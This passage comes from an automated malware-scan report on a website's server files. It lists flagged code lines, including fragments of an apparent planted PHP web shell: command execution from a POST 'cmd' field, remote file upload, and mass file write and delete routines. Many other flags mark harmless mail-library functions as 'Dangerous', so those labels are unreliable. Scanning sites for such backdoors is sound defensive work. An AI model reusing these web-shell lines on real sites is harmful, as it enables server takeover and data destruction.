</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_122").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/cn4cko9d.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-06-16 13:17:04</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 27</span><br><table id="file_123" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'src'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">].</span><span style="color: #DD0000">' 2>&1'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">fileowner</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">)); </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= </span><span style="color: #0000BB">$fowner</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; }else{ </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= </span><span style="color: #0000BB">fileowner</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">); } if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$fgrp </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">)); </span><span style="color: #0000BB">$fgrp </span><span style="color: #007700">= </span><span style="color: #0000BB">$fgrp</span><span style="color: #007700">[</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function:<</span><span style="color: #0000BB">div </span><span style="color: #007700">class=</span><span style="color: #DD0000">'table-responsive'</span><span style="color: #007700">></span><span style="color: #0000BB">$disfc</span><span style="color: #007700"></</span><span style="color: #0000BB">div</span><span style="color: #007700">></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mass_kabeh</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">,</span><span style="color: #0000BB">$isi_script</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">▟</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">,</span><span style="color: #0000BB">$p</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mass_biasa</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">,</span><span style="color: #0000BB">$isi_script</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hapus_massal</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<gr class='anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$p</span><span style="color: #007700">.</span><span style="color: #DD0000">"</gr>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<rd class='anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$p</span><span style="color: #007700">.</span><span style="color: #DD0000">"</rd>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 318</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">right</span><span style="color: #DD0000">'></i></button></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ok</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">er</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sz</span><span style="color: #007700">(</span><span style="color: #0000BB">$byt</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return(</span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$byt</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">" "</span><span style="color: #007700">.</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ip</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
